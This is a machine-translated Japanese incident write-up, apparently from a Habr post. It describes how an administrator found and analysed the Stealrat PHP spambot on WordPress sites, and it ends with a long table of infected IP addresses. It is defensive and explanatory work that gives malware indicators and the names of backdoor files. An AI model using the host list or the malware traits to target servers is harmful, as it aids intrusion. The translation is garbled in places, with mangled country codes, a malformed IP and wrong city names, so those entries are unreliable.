🔡 👰🏼 🧑‍🤝‍🧑 スパムボットステラット ⁉️ ⛴️ 🛐

Stealratスパムボットについて聞いたことがないですか？おそらく、この投稿を読んでいる間、お気に入りのサイトは自分のメールサーバーを介して何千ものスパムメッセージを送信しています。 HabréのStealratスパムボットについては、これ以上の参照はありませんでしたが、これは非常に奇妙です。

サーバーの1つが感染しています。サーバーは主にWordpressサイトをホストしていました。問題は局所化され、全員が掃除されてカバーされました。すべてがうまくいきますが、一つだけあります...

Stealratスパムボットは、ボットネットの原理に基づいています。 WordPressやJoomla！などの人気のあるCMSでホストされています。、 Drupal、およびその他のセキュリティで保護されていない脆弱なサイト。

要するに、これはkapets同志であり、このような規模のスパムボットです。数千の感染サイト。詳細は後ほど。

技術仕様

悪意のあるスクリプトはPHPで記述されています。コードは圧縮され、コード難読化プログラムを通過します。 eval関数があります。すべてのデータは、base64エンコーディングのPOSTメソッドの配列によって受信されます。文字列「 die（PHP_OS.chr（49）.chr（48）.chr（43）.md5（0987654321））; 」の形式の文字列規則性もあります。ボットは、サイトのドメインに基づいて送信者のランダムな名前で電子メールメッセージを生成し、PHPメール機能を介して電子メールを送信しようとします。そのような機能が利用できない場合、ボットはソケットを介してメールサーバーに接続し、メール機能をバイパスして送信しようとします。基本的に、ボットはハッキングされたサイトのhtmlページをプロキシすることにより、ポルノサイトへのリンクを含むスパムメッセージを送信します。制御スクリプト自体に加えて、さまざまなCMS Wordpressフォルダーで多くのバックドアとWebシェルが見つかりました。スクリプトの名前はランダムです。たとえば、styles.php、del.php、up.php、index.php（メインインデックスファイルがないか、空であるフォルダー内）、bak.php、image.php、testです。 php、code.php、dir.php diff.phpなど

検出、兆候、最初の措置

私の目に留まった最初のことは、電子メールの送信と受信の間の遅延でした。メールサーバーのキューには、送信する数十万の手紙がありました。ムニンは彼のスケジュールに感謝し、見て、恐ろしくなりました。キューからすべての文字を削除しました。 Apacheサーバーのステータスを通じて、仮想ホストの1つのphpスクリプトに対する奇妙なPOSTリクエストが見つかりました。ご想像のとおり、Wordpressでした。ファイルの名前を変更して悪意のあるスクリプトを隠し、感染した仮想ホストのバックアップを作成しました。バックアップからサイトファイルを復元し、htaccessファイルを使用してすべてのフォルダーへのアクセスを閉じ、IPのみにアクセスを残しました。一般に、サイトの通常の操作を確立しました。他のすべては、コントロールパネルと、クラスと追加のライブラリを含むすべての追加フォルダーに閉じられました。

コード分析、悪意のあるスクリプトによる詳細の検索

その後、コマンドを受信してメッセージを送信した悪意のあるスクリプト自体の分析を開始しました。コードを並べて、すべてを棚に置きました。難読化後、コードは読み取り不可になり、変数と関数の名前はランダムに命名されます。テキストエディターでのコードの実行と通常のテキストの置換の観点からコードを調べ、すべてを通常の読みやすい形式にします。コードをフォーマットした直後にすべてが明らかになり、変数と関数の名前をキャストした後、文字の本文の形成の詳細、送信者の名前、およびメールヘッダーが明確になりました。

次に、検索はGoogle検索エンジンと元のスパムボットコードから始まりました。コードの類似した繰り返しセクションを見つけようとしました。検索では意味のある結果が得られず、次のような結果が見つかった場合：

ユーザー1：（isset（$ _ POST ['n8743bb']））{base64_decode（$ _ POST ['n8743bb']）}の場合、サイトに何がありますか？
ユーザー2：サイトがハッキングされました。ウェブシェルを探してください...
終わり

奇跡的に、すべてが詳細かつ詳細に記述されたPDF形式の会社文書trendmicro（ Link ）を見つけることができました。私たちは見た-同じ兆候、すべてがまったく同じです。さて、少なくとも悪意のあるスクリプトの名前が見つかりました： Stealrat 。 Stealratの言葉によると、再びグーグルで検索します。

次に何をしましたか？

悪意のあるスクリプトがアップロードされた穴の識別は、「後で」に残されました。代わりに、データを解読し、IPアドレスをデータベースに記録し、何も起こらなかったように動作するはずの動作をするように、解析済みスクリプトを変更しました。ロギングは1週間から現在まで実行されています。このすべてのためにWebインターフェイスを作成し、GeoIPとショックをねじ込みました...

現在、ログには約580,638のPOST呼び出し、1223の一意のIPアドレス、59か国からの感染サイト（ホスティング、仮想ホスト）があります。何よりもロシアから。

いくつかの統計

感染した一意のIPの完全なリスト（1223）

IP	ヒット数	国コード	国名	市区町村
77.222.61.177	7428	RU	ロシア連邦
37.187.134.225	5592	FR	フランス
93.95.102.215	5532	RU	ロシア連邦
77.222.40.32	5364	RU	ロシア連邦
81.169.175.71	4812	DE	ドイツ	ベルリン
77.222.56.216	4812	RU	ロシア連邦
82.98.131.108	4320	ES	スペイン
77.222.42.206	4308	RU	ロシア連邦
81.25.112.130	4044	ES	スペイン
192.196.156.128	3972	米国	米国	ウエストチェスター
37.187.140.59	3948	FR	フランス
77.222.56.50	3804	RU	ロシア連邦
77.222.61.126	3684	RU	ロシア連邦
77.222.42.105	3552	RU	ロシア連邦
78.46.142.128	3504	DE	ドイツ
31.31.196.14	3216	RU	ロシア連邦
77.222.56.218	3168	RU	ロシア連邦
37.1.194.126	3024	DE	ドイツ
54.207.1.94	3000	米国	米国	シアトル
81.22.215.82	2916	RU	ロシア連邦
175.143.102.33	2892	私の	マレーシア	アンパン
46.8.37.103	2808	GR	ギリシャ	パトラス
199.116.77.18	2724	米国	米国	トラバースシティ
77.222.42.202	2688	RU	ロシア連邦
77.222.61.224	2676	RU	ロシア連邦
91.144.0.92	2664	SY	シリア・アラブ共和国
77.222.61.141	2664	RU	ロシア連邦
69.93.112.130	2628	米国	米国	ヒューストン
95.31.251.22	2628	RU	ロシア連邦
77.222.61.135	2580	RU	ロシア連邦
77.222.61.14	2520	RU	ロシア連邦
144.76.3.116	2472	DE	ドイツ
178.63.27.83	2448	DE	ドイツ
5.79.68.147	2424	Nl	オランダ	アムステルダム
77.222.40.122	2376	RU	ロシア連邦
77.222.56.201	2340	RU	ロシア連邦
199.127.219.121	2340	米国	米国	オーランド
77.222.40.40	2304	RU	ロシア連邦
75.150.62.121	2160	米国	米国	アッシュバーン
95.79.25.124	2136	RU	ロシア連邦	ニジニ・ノヴゴロド
64.131.66.119	2112	米国	米国	レストン
188.168.81.13	2076	RU	ロシア連邦	知多
77.222.40.75	2076	RU	ロシア連邦
77.222.61.10	2052	RU	ロシア連邦
77.222.61.154	2028	RU	ロシア連邦
46.105.37.61	2004	FR	フランス
77.244.145.236	1968	Tj	タジキスタン
90.189.192.100	1968	RU	ロシア連邦	ノボシビルスク
46.16.188.2	1956	GB	イギリス
109.74.144.122	1944	SK	スロバキア
108.166.181.163	1944	米国	米国	ダラス
77.222.40.165	1932	RU	ロシア連邦
77.222.42.228	1896	RU	ロシア連邦
77.222.56.207	1884	RU	ロシア連邦
77.222.61.138	1848	RU	ロシア連邦
77.222.56.205	1848	RU	ロシア連邦
89.223.104.156	1836	RU	ロシア連邦
89.184.74.156	1836	UA	ウクライナ	キエフ
91.228.236.11	1800	UA	ウクライナ
37.140.193.35	1788	RU	ロシア連邦
69.42.49.134	1764	CA	カナダ	トロント
77.222.40.93	1764	RU	ロシア連邦
109.123.155.11	1752	RU	ロシア連邦	トムスク
212.55.180.197	1716	PT	ポルトガル
54.232.216.189	1716	BR	ブラジル	スー・パウロ
37.140.192.48	1716	RU	ロシア連邦
199.187.124.244	1680	米国	米国	フィラデルフィア
77.222.40.208	1680	RU	ロシア連邦
37.140.192.223	1656	RU	ロシア連邦
174.143.204.52	1644	米国	米国	サンアントニオ
77.222.42.238	1644	RU	ロシア連邦
198.154.236.22	1620	米国	米国	ヒューストン
24.56.180.66	1620	米国	米国	ウッドランドパーク
77.222.40.131	1608	RU	ロシア連邦
77.232.66.20	1584	EU	ヨーロッパ
144.76.107.253	1584	DE	ドイツ
193.106.92.206	1572	RU	ロシア連邦	モスクワ
89.31.96.196	1560	Nl	オランダ
217.70.145.26	1548	IT	イタリア
77.222.56.213	1536	RU	ロシア連邦
77.222.61.243	1536	RU	ロシア連邦
77.222.40.145	1524	RU	ロシア連邦
216.14.115.203	1524	米国	米国	バッファローグローブ
77.222.40.39	1512	RU	ロシア連邦
37.140.192.34	1512	RU	ロシア連邦
46.19.232.104	1488	IT	イタリア	ポルデノン
185.13.44.3	1476	RU	ロシア連邦
204.145.100.34	1464	米国	米国	コーパスクリスティ
12/12 / 124.103	1464	RU	ロシア連邦
77.222.40.137	1452	RU	ロシア連邦
208.109.236.165	1452	米国	米国	スコッツデール
199.116.77.13	1452	米国	米国	トラバースシティ
211.181.136.111	1440	KR	韓国、共和国
195.70.36.86	1440	胡	ハンガリー
77.222.40.105	1428	RU	ロシア連邦
5.187.4.5	1416	DE	ドイツ	フランクフルト
217.115.185.44	1368	RU	ロシア連邦	コムソモルスカヤ
77.222.40.62	1368	RU	ロシア連邦
212.113.145.188	1368	GB	イギリス
205.134.241.45	1344	米国	米国	ロサンゼルス
204.197.252.48	1332	米国	米国	ロサンゼルス
81.89.48.114	1332	SK	スロバキア
77.222.56.203	1320	RU	ロシア連邦
46.36.219.220	1284	ええ	エストニア
77.222.40.59	1272	RU	ロシア連邦
77.222.40.72	1272	RU	ロシア連邦
77.222.56.94	1260	RU	ロシア連邦
42.112.16.118	1260	Vn	ベトナム	ハノイ
194.190.184.71	1248	RU	ロシア連邦	ニジニ・ノヴゴロド
37.59.131.240	1236	FR	フランス
199.116.77.28	1224	米国	米国	トラバースシティ
37.140.192.235	1224	RU	ロシア連邦
69.72.130.98	1212	米国	米国	クリフトン
173.236.184.107	1212	米国	米国	ブレア
188.190.123.59	1212	UA	ウクライナ	ハリコフ
77.222.40.109	1200	RU	ロシア連邦
91.221.61.83	1200	RU	ロシア連邦
77.222.56.6	1188	RU	ロシア連邦
193.37.152.179	1188	DE	ドイツ
200.82.144.234	1176	Ve	ベネズエラ	カラカス
106.187.53.107	1176	JP	日本
212.92.23.81	1176	胡	ハンガリー
222.122.81.19	1176	KR	韓国、共和国
50.31.99.1	1175	米国	米国	シカゴ
77.222.61.170	1164	RU	ロシア連邦
77.222.56.204	1140	RU	ロシア連邦
37.140.192.104	1128	RU	ロシア連邦
80.248.213.214	1128	FR	フランス	ジフ・シュル・イヴェット
84.201.36.232	1128	DE	ドイツ
199.116.78.163	1128	米国	米国	トラバースシティ
46.18.32.78	1128	BE	ベルギー
77.222.61.99	1128	RU	ロシア連邦
5.9.32.199	1128	DE	ドイツ
67.139.73.190	1128	米国	米国	バンクーバー
38.92.224.164	1104	米国	米国	マイアミ
195.189.111.60	1104	RU	ロシア連邦
91.191.172.198	1104	TR	トルコ	イズミル
164.177.154.130	1092	GB	イギリス
106.187.46.64	1080	JP	日本
77.222.61.150	1080	RU	ロシア連邦
78.46.32.115	1068	DE	ドイツ	ネルンベルク
213.248.30.74	1068	RU	ロシア連邦
195.154.222.121	1068	FR	フランス
78.47.58.134	1056	DE	ドイツ
75.126.229.50	1044	米国	米国	ダラス
82.165.138.50	1044	DE	ドイツ
77.222.56.223	1044	RU	ロシア連邦
216.70.112.74	1032	米国	米国	カルバーシティ
77.71.24.3	1032	BG	ブルガリア	バルナ
89.207.74.38	1032	RU	ロシア連邦
192.163.202.154	1020	米国	米国	プロボ
77.222.61.17	1020	RU	ロシア連邦
77.222.40.160	1020	RU	ロシア連邦
82.145.37.137	1020	GB	イギリス
94.46.8.45	1008	PT	ポルトガル	リスボン
173.205.127.243	1008	米国	米国
134.213.1.108	1008	GB	イギリス
213.249.64.34	996	Nl	オランダ	アムステルダム
31.210.62.36	996	TR	トルコ	サナイ
77.222.40.88	996	RU	ロシア連邦
78.4.254.161	996	IT	イタリア
50.23.16.2	996	米国	米国	ダラス
77.222.40.48	996	RU	ロシア連邦
37.140.192.47	996	RU	ロシア連邦
77.222.42.160	984	RU	ロシア連邦
74.50.27.62	984	米国	米国	アナハイム
72.52.252.21	984	米国	米国	ランシング
82.99.171.171	972	Cz	チェコ共和国
69.163.222.201	972	米国	米国	ブレア
216.234.108.151	972	米国	米国	サウスフィールド
216.246.23.203	972	米国	米国	シカゴ
77.222.42.226	960	RU	ロシア連邦
77.222.40.25	960	RU	ロシア連邦
46.105.56.164	960	FR	フランス
188.168.46.53	960	RU	ロシア連邦
37.140.192.97	960	RU	ロシア連邦
217.174.97.19	960	RU	ロシア連邦	モスクワ
5.9.40.52	948	DE	ドイツ
134.0.113.40	948	RU	ロシア連邦
91.202.171.103	948	IL	イスラエル
77.222.56.18	936	RU	ロシア連邦
83.69.176.252	936	RU	ロシア連邦
71.6.221.100	936	米国	米国	サンディエゴ
193.178.146.181	936	UA	ウクライナ
10.10.195.211	924	DE	ドイツ	ネルンベルク
109.196.210.110	924	RU	ロシア連邦	ジェレズノゴルスク
5.187.1.149	924	DE	ドイツ	フランクフルト
91.228.199.180	924	PL	ポーランド
199.204.248.103	924	米国	米国	コロンバス
132.247.1.49	912	MX	メキシコ	メキシコ
77.222.40.206	912	RU	ロシア連邦
87.230.40.60	912	DE	ドイツ	一番
213.239.201.157	912	DE	ドイツ	ネルンベルク
91.201.52.78	912	RU	ロシア連邦
94.229.68.98	900	GB	イギリス
196.212.74.122	900	ザ	南アフリカ	ヘルマナス
212.143.6.114	900	IL	イスラエル
216.97.233.44	888	米国	米国	アナハイム
217.172.179.17	888	DE	ドイツ
212.180.241.99	876	PL	ポーランド
77.222.56.166	864	RU	ロシア連邦
64.92.209.154	864	米国	米国	イングルウッド
159.253.39.225	864	TR	トルコ
166.78.188.144	864	米国	米国	サンアントニオ
63.143.53.66	852	米国	米国	ダラス
65.99.237.35	852	米国	米国	セントルイス
85.214.103.141	840	DE	ドイツ	ベルリン
77.222.40.114	840	RU	ロシア連邦
176.9.46.72	840	DE	ドイツ
208.43.56.34	840	米国	米国	ダラス
176.9.84.22	840	DE	ドイツ
77.222.40.172	828	RU	ロシア連邦
190.0.140.27	828	うん	ウルグアイ	モンテビデオ
88.191.123.124	828	FR	フランス	パリ
195.93.180.34	828	RU	ロシア連邦
92.46.62.199	816	KZ	カザフスタン
129.121.177.200	816	米国	米国	アルバカーキ
77.222.61.12	816	RU	ロシア連邦
50.57.190.250	816	米国	米国	サンアントニオ
37.140.192.39	816	RU	ロシア連邦
216.246.41.118	804	米国	米国	シカゴ
95.169.184.30	804	DE	ドイツ
213.162.246.72	804	いや	ノルウェー
87.106.208.181	804	DE	ドイツ
199.167.47.227	792	米国	米国	マクリーン
168.144.134.181	792	CA	カナダ	トロント
5.9.19.73	792	DE	ドイツ
85.214.216.117	792	DE	ドイツ	ベルリン
85.13.135.146	792	DE	ドイツ
91.201.53.12	780	RU	ロシア連邦
77.79.246.80	780	PL	ポーランド	ヤストジェビ・ズドロ
77.222.61.19	780	RU	ロシア連邦
77.222.40.158	780	RU	ロシア連邦
64.34.157.100	780	米国	米国	ニューヨーク
209.239.112.108	780	米国	米国	セントルイス
76.74.242.190	780	米国	米国	ニューヨーク
166.63.126.169	780	米国	米国	コロンバス
31.31.196.41	768	RU	ロシア連邦
77.221.130.48	768	RU	ロシア連邦
162.144.85.59	768	米国	米国	プロボ
77.222.40.64	768	RU	ロシア連邦
50.23.81.114	768	米国	米国	サンノゼ
173.199.142.151	768	米国	米国	シカゴ
194.146.134.2	768	UA	ウクライナ	ルガンスク
148.251.75.178	756	DE	ドイツ
109.247.129.59	756	いや	ノルウェー
77.222.61.85	756	RU	ロシア連邦
173.199.142.14	756	米国	米国	シカゴ
77.222.40.22	756	RU	ロシア連邦
202.78.227.53	756	Vn	ベトナム
173.236.152.136	756	米国	米国	ブレア
5.9.229.51	756	DE	ドイツ
64.131.73.92	744	米国	米国	レストン
202.75.53.90	744	私の	マレーシア
38.112.60.242	744	米国	米国
188.120.255.78	744	RU	ロシア連邦	モスクワ
88.191.232.238	744	FR	フランス	パリ
67.228.16.138	744	米国	米国	ダラス
95.110.202.235	732	IT	イタリア
209.51.155.226	732	米国	米国	アトランタ
85.25.118.107	732	DE	ドイツ
85.13.131.32	732	DE	ドイツ
46.37.21.116	732	IT	イタリア
37.140.193.24	732	RU	ロシア連邦
37.143.11.70	732	RU	ロシア連邦
5.149.139.8	732	BE	ベルギー
198.46.82.33	732	米国	米国	ロサンゼルス
144.76.114.78	720	DE	ドイツ
89.31.103.165	720	Nl	オランダ
185.4.75.115	720	ええ	エストニア
92.48.115.19	720	GB	イギリス
216.177.136.215	720	米国	米国	ラグナ・ニゲル
180.210.206.201	720	SG	シンガポール
77.222.61.77	708	RU	ロシア連邦
205.186.143.5	708	米国	米国	カルバーシティ
91.201.52.81	708	RU	ロシア連邦
188.225.16.46	708	RU	ロシア連邦
77.222.40.199	708	RU	ロシア連邦
37.140.192.91	696	RU	ロシア連邦
85.25.134.63	696	DE	ドイツ
77.37.150.72	696	RU	ロシア連邦	モスクワ
80.252.184.10	696	SE	スウェーデン
94.181.117.21	696	RU	ロシア連邦	イジェフスク
173.193.195.140	696	米国	米国	ダラス
193.108.251.210	696	UA	ウクライナ	チェルカッシー
77.222.40.118	696	RU	ロシア連邦
37.187.17.109	684	FR	フランス
164.138.216.83	684	BG	ブルガリア
46.4.130.178	684	DE	ドイツ
31.186.175.15	684	Nl	オランダ
195.62.78.7	684	RU	ロシア連邦
77.222.40.55	684	RU	ロシア連邦
54.186.24.70	684	米国	米国	取締役
77.222.40.148	684	RU	ロシア連邦
77.222.42.236	684	RU	ロシア連邦
89.96.141.25	684	IT	イタリア
66.85.130.226	672	米国	米国	テンペ
77.222.40.200	672	RU	ロシア連邦
88.198.193.147	672	DE	ドイツ
194.141.47.8	672	BG	ブルガリア
216.137.165.54	672	CA	カナダ	Bcancan
188.95.51.249	672	Nl	オランダ
77.222.56.7	672	RU	ロシア連邦
31.28.24.112	660	RU	ロシア連邦
67.225.159.38	660	米国	米国	ランシング
144.76.16.182	660	DE	ドイツ
69.163.241.179	648	米国	米国	ブレア
194.144.248.227	648	IS	アイスランド	レイキャビク
129.121.176.169	648	米国	米国	アルバカーキ
85.214.194.248	648	DE	ドイツ	ベルリン
205.234.152.98	648	米国	米国	バッファロー
162.243.5.242	648	米国	米国
5.63.147.252	648	GB	イギリス
77.222.61.42	648	RU	ロシア連邦
198.145.183.3	648	米国	米国	ポートランド
77.222.40.202	636	RU	ロシア連邦
67.18.8.2	636	米国	米国	ヒューストン
5.63.158.111	636	RU	ロシア連邦
207.7.92.188	636	米国	米国	ロサンゼルス
109.74.5.154	636	SE	スウェーデン	ストックホルム
209.105.246.250	636	米国	米国	ダラス
77.222.61.75	636	RU	ロシア連邦
77.222.61.84	624	RU	ロシア連邦
192.254.156.170	624	米国	米国	ヒューストン
77.232.66.165	624	EU	ヨーロッパ
184.107.227.2	624	CA	カナダ	モントラル
67.227.161.141	624	米国	米国	ランシング
108.165.21.198	624	米国	米国	プロボ
96.31.68.213	624	米国	米国	タンパ
77.222.40.171	624	RU	ロシア連邦
2.81.148.63	624	PT	ポルトガル	アベイロ
64.120.236.234	624	米国	米国	スクラントン
78.40.124.42	612	FR	フランス
95.141.46.140	612	IT	イタリア	マルコ
192.190.86.126	612	米国	米国	ウエストチェスター
91.227.68.26	612	RU	ロシア連邦
85.13.139.11	612	DE	ドイツ
188.225.24.62	600	RU	ロシア連邦
62.112.193.206	600	胡	ハンガリー
89.184.76.158	600	UA	ウクライナ	キエフ
198.154.241.84	600	米国	米国	ヒューストン
205.186.129.174	600	米国	米国	カルバーシティ
213.146.180.240	600	GB	イギリス
77.221.130.25	600	RU	ロシア連邦
193.164.192.89	600	Nl	オランダ
108.171.172.108	600	米国	米国	サンアントニオ
185.22.234.47	600	RU	ロシア連邦
176.9.219.69	600	DE	ドイツ
49.247.220.105	600	KR	韓国、共和国
172.245.32.55	600	米国	米国	バッファロー
89.184.69.128	600	UA	ウクライナ	キエフ
70.32.92.148	600	米国	米国	カルバーシティ
85.13.140.111	600	DE	ドイツ
77.222.42.99	600	RU	ロシア連邦
77.222.61.189	600	RU	ロシア連邦
182.160.155.25	588	Au	オーストラリア	サリーヒルズ
77.222.40.73	588	RU	ロシア連邦
85.214.233.193	588	DE	ドイツ	ベルリン
31.193.138.86	588	GB	イギリス
210.79.48.7	588	Nz	ニュージーランド
78.47.152.75	588	DE	ドイツ
10.96.201.58	588	RU	ロシア連邦
88.198.2.199	588	DE	ドイツ	ネルンベルク
81.169.176.225	588	DE	ドイツ	ベルリン
164.138.209.44	588	ES	スペイン
69.10.33.130	588	米国	米国	セコーカス
168.144.159.47	588	CA	カナダ	トロント
50.97.104.146	588	米国	米国	ダラス
109.86.206.43	588	UA	ウクライナ
176.9.85.162	588	DE	ドイツ
78.46.49.169	588	DE	ドイツ	ネルンベルク
85.13.137.250	576	DE	ドイツ
217.160.168.14	576	DE	ドイツ
82.220.34.47	576	CH	スイス
188.126.73.71	576	SE	スウェーデン
216.120.237.195	576	米国	米国	クリフトンパーク
205.134.254.66	576	米国	米国	ロサンゼルス
85.214.89.233	576	DE	ドイツ	ベルリン
144.76.225.138	576	DE	ドイツ
82.146.44.74	576	RU	ロシア連邦	モスクワ
144.76.173.120	576	DE	ドイツ
93.191.155.169	576	DK	デンマーク
77.222.40.149	576	RU	ロシア連邦
95.142.65.116	576	DE	ドイツ	ギルチング
46.4.147.233	564	DE	ドイツ
87.117.215.158	564	GB	イギリス
67.222.18.35	564	米国	米国	ロサンゼルス
37.140.192.240	564	RU	ロシア連邦
174.142.115.7	564	CA	カナダ	モントラル
78.81.255.115	564	RU	ロシア連邦	ヴェリキー・ノヴゴロド
85.214.29.65	564	DE	ドイツ	ベルリン
95.110.229.90	564	IT	イタリア
85.13.146.60	564	DE	ドイツ
80.91.80.52	564	ES	スペイン
64.64.27.226	564	米国	米国	レストン
212.98.163.238	564	BY	ベラルーシ	ミンスク
46.165.219.73	564	DE	ドイツ
88.208.217.191	564	GB	イギリス	グロスター
91.222.11.212	564	GB	イギリス
85.158.203.164	552	Nl	オランダ
88.190.28.162	552	FR	フランス	パリ
213.115.25.231	552	SE	スウェーデン
213.229.110.89	552	GB	イギリス
93.183.203.76	552	UA	ウクライナ
67.225.220.136	552	米国	米国	ランシング
50.62.41.168	552	米国	米国	スコッツデール
77.222.61.108	552	RU	ロシア連邦
88.190.51.72	552	FR	フランス	パリ
80.70.2.4	552	DK	デンマーク	コペンハーゲン
77.222.42.95	552	RU	ロシア連邦
176.53.25.197	540	TR	トルコ
199.188.247.40	540	米国	米国	ヒューストン
108.83.139.140	540	米国	米国
129.121.177.74	540	米国	米国	アルバカーキ
63.247.137.102	540	米国	米国	ジャクソンビル
62.75.236.228	540	DE	ドイツ
72.55.164.206	540	CA	カナダ	モントラル
207.198.125.117	540	米国	米国	アトランタ
77.222.40.33	540	RU	ロシア連邦
85.13.148.107	540	DE	ドイツ
207.210.192.231	540	米国	米国	ダラス
188.40.227.97	540	DE	ドイツ
203.162.53.111	540	Vn	ベトナム
198.1.101.233	540	米国	米国	プロボ
185.23.16.138	540	LT	リトアニア
78.140.185.138	540	Nl	オランダ
62.212.103.171	540	FR	フランス
216.139.217.60	540	米国	米国	オースティン
94.23.31.18	528	FR	フランス
85.13.141.115	528	DE	ドイツ
69.39.239.172	528	米国	米国	アーリントンハイツ
208.113.162.92	528	米国	米国	ブレア
67.205.7.224	528	米国	米国	ブレア
64.119.182.134	528	米国	米国	イングルウッド
91.184.30.7	528	Nl	オランダ
109.74.2.144	528	SE	スウェーデン	ファルケンベルク
87.230.12.175	528	DE	ドイツ	一番
75.98.175.80	528	米国	米国	アナーバー
91.239.66.84	528	PL	ポーランド
87.106.56.81	528	DE	ドイツ
91.226.212.151	528	UA	ウクライナ
37.140.192.81	516	RU	ロシア連邦
50.97.106.106	516	米国	米国	ダラス
77.222.40.245	516	RU	ロシア連邦
177.43.122.178	516	BR	ブラジル	ベロホリゾンノンテ
69.93.97.98	516	米国	米国	ヒューストン
184.107.138.26	516	CA	カナダ	モントラル
195.200.253.149	516	PT	ポルトガル
144.76.171.25	516	DE	ドイツ
46.4.48.211	516	DE	ドイツ
31.31.201.3	516	RU	ロシア連邦
216.27.5.9	516	米国	米国	リトルロック
78.46.61.106	516	DE	ドイツ	ネルンベルク
77.222.61.227	516	RU	ロシア連邦
31.210.62.37	516	TR	トルコ	サナイ
85.214.43.163	516	DE	ドイツ	ベルリン
88.190.231.87	504	FR	フランス	パリ
77.222.57.159	504	RU	ロシア連邦
217.79.179.163	504	DE	ドイツ
150.146.204.33	504	IT	イタリア	中央
54.252.157.46	504	Au	オーストラリア	シドニー
162.248.48.75	504	米国	米国
5.79.65.102	504	Nl	オランダ	アムステルダム
192.145.239.3	504	米国	米国	ロサンゼルス
130.185.83.152	504	PT	ポルトガル
62.76.190.228	504	RU	ロシア連邦
94.214.169.231	504	Nl	オランダ
37.140.197.111	504	RU	ロシア連邦
5.9.125.234	504	DE	ドイツ
178.63.88.199	504	DE	ドイツ
94.199.178.153	504	胡	ハンガリー
134.0.112.21	504	RU	ロシア連邦
103.11.100.46	504	Hk	香港
37.140.192.78	492	RU	ロシア連邦
89.184.69.66	492	UA	ウクライナ	キエフ
77.222.42.120	492	RU	ロシア連邦
173.254.28.144	492	米国	米国	プロボ
79.137.213.14	492	RU	ロシア連邦
91.201.52.34	492	RU	ロシア連邦
69.160.53.210	492	米国	米国	サウスフィールド
69.64.38.84	492	米国	米国	セントルイス
162.144.68.24	492	米国	米国	プロボ
116.213.5.192	492	Au	オーストラリア
46.4.99.85	480	DE	ドイツ
93.89.54.155	480	IT	イタリア
83.169.30.138	480	DE	ドイツ	一番
198.24.164.178	480	米国	米国	テンペ
67.23.47.245	480	米国	米国	サンアントニオ
77.222.40.155	480	RU	ロシア連邦
208.76.80.113	480	米国	米国	トロイ
207.58.176.132	480	米国	米国	マクリーン
144.76.68.77	480	DE	ドイツ
75.127.110.48	480	米国	米国	アトランタ
50.22.86.10	480	米国	米国	ダラス
91.230.211.138	480	RU	ロシア連邦
149.154.157.35	480	IT	イタリア	ミラノ
188.138.112.229	480	DE	ドイツ
216.246.0.119	480	米国	米国	シカゴ
91.228.197.83	480	PL	ポーランド
70.38.98.232	480	CA	カナダ	モントラル
178.238.232.86	480	DE	ドイツ
68.90.69.177	480	米国	米国	セントピーターズ
173.193.244.28	468	米国	米国	ダラス
141.72.197.122	468	DE	ドイツ	シュトゥットガルト
173.10.247.83	468	米国	米国	アルバカーキ
78.46.229.103	468	DE	ドイツ
37.59.13.98	468	FR	フランス
198.143.156.194	468	米国	米国	シカゴ
134.255.230.21	468	DE	ドイツ
195.14.104.38	468	RU	ロシア連邦
209.212.240.116	468	米国	米国	シンシナティ
188.120.237.187	468	RU	ロシア連邦	モスクワ
176.98.48.37	468	UA	ウクライナ
173.254.246.5	468	米国	米国	ロサンゼルス
37.140.192.58	468	RU	ロシア連邦
199.116.255.171	468	米国	米国	シェルツ
74.50.112.162	468	米国	米国	タンパ
89.185.250.84	456	Cz	チェコ共和国
149.154.64.105	456	RU	ロシア連邦
76.76.107.122	456	CA	カナダ	モントラル
74.208.144.39	456	米国	米国	ウェイン
162.40.4.56	456	米国	米国	グレンウッド
193.107.88.60	456	PL	ポーランド
91.234.146.224	456	PL	ポーランド
209.61.173.134	456	米国	米国	サンアントニオ
49.212.141.75	456	JP	日本	大阪府
79.140.78.106	456	RU	ロシア連邦
178.17.41.215	456	GB	イギリス
192.155.85.147	456	米国	米国	アブセコン
162.243.19.158	456	米国	米国
66.186.176.231	456	米国	米国	バンゴー
37.205.32.122	456	IS	アイスランド	セルフォス
148.251.41.175	444	DE	ドイツ
62.112.194.8	444	胡	ハンガリー
85.214.97.202	444	DE	ドイツ	ベルリン
216.187.66.17	444	米国	米国	ニューヨーク
178.32.136.17	444	IT	イタリア
64.202.249.5	444	米国	米国	エデンプレーリー
85.13.136.190	444	DE	ドイツ
144.76.209.46	444	DE	ドイツ
178.63.13.86	444	DE	ドイツ
207.7.84.87	444	米国	米国	ダラス
178.77.97.161	444	DE	ドイツ	一番
38.102.33.28	444	米国	米国
109.109.232.226	432	GB	イギリス
109.68.38.23	432	GB	イギリス
188.126.73.68	432	SE	スウェーデン
37.59.4.200	432	FR	フランス
77.222.56.219	432	RU	ロシア連邦
92.53.106.13	432	RU	ロシア連邦
85.236.39.38	432	DE	ドイツ
85.214.218.136	432	DE	ドイツ	ベルリン
46.4.65.154	432	DE	ドイツ
87.98.238.195	432	PL	ポーランド
62.76.6.54	432	RU	ロシア連邦	スカノバ
103.9.100.77	432	SG	シンガポール
37.59.8.100	432	FR	フランス
5.77.48.199	432	GB	イギリス
188.65.117.67	432	GB	イギリス
198.23.98.132	432	米国	米国	ダラス
177.73.233.247	432	BR	ブラジル
5.9.136.6	432	DE	ドイツ
5.9.150.228	420	DE	ドイツ
142.4.11.47	420	米国	米国	プロボ
113.28.167.81	420	Hk	香港
103.11.100.16	420	Hk	香港
5.187.1.59	420	DE	ドイツ	フランクフルト
27.254.36.227	420	Th	タイ
69.50.197.238	420	米国	米国	フェニックス
77.222.40.176	420	RU	ロシア連邦
77.222.61.193	420	RU	ロシア連邦
69.176.116.145	420	米国	米国	ヴァンクリーブ
49.50.8.21	420	ID	インドネシア
103.9.100.130	420	SG	シンガポール
199.231.228.34	420	米国	米国	ハンツビル
195.200.78.84	420	FR	フランス
80.79.243.29	420	RU	ロシア連邦
203.211.143.71	408	SG	シンガポール
65.99.237.21	408	米国	米国	セントルイス
89.31.72.177	408	IT	イタリア
208.113.153.219	408	米国	米国	ブレア
50.23.40.50	408	米国	米国	ダラス
209.200.247.119	408	米国	米国	アナハイム
208.76.83.22	408	米国	米国	トロイ
184.173.248.206	408	米国	米国	ヒューストン
198.57.194.245	408	米国	米国	プロボ
89.200.171.219	408	DE	ドイツ
79.172.211.73	408	胡	ハンガリー
65.183.81.70	408	米国	米国	アレンスパーク
50.17.217.186	408	米国	米国	アッシュバーン
66.240.213.72	396	米国	米国	サンディエゴ
77.222.42.108	396	RU	ロシア連邦
63.247.138.155	396	米国	米国	ジャクソンビル
74.208.65.64	396	米国	米国	ウェイン
185.20.226.88	396	RU	ロシア連邦
